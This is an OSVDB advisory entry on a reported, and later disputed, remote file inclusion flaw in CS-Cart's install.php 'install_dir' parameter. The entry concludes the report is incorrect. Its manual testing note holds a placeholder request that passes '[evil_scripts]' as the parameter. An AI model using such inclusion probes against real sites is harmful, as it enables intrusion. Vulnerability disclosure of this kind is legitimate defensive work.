CS-Cart install.php install_dir Variable Remote File Inclusion

2007-01-09T17:32:42
ID OSVDB:31277
Type osvdb
Reporter OSVDB
Modified 2007-01-09T17:32:42

Description

Vulnerability Description

CS-Cart has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to the install.php script not properly sanitizing user input supplied to the 'install_dir' variable. However, subsequent examination indicates the variable is previously set before an attacker can manipulate it.

Solution Description

The vulnerability reported is incorrect. No solution required.

Short Description

CS-Cart has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to the install.php script not properly sanitizing user input supplied to the 'install_dir' variable. However, subsequent examination indicates the variable is previously set before an attacker can manipulate it.

Manual Testing Notes

http://[target]/[CS-Cart_path]/install.php?install_dir=[evil_scripts]

References:

Vendor URL: http://www.cs-cart.com/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0284.html Mail List Post: http://attrition.org/pipermail/vim/2007-January/001223.html Mail List Post: http://www.securityfocus.com/archive/1/archive/1/456527/100/0/threaded ISS X-Force ID: 31408 CVE-2007-0230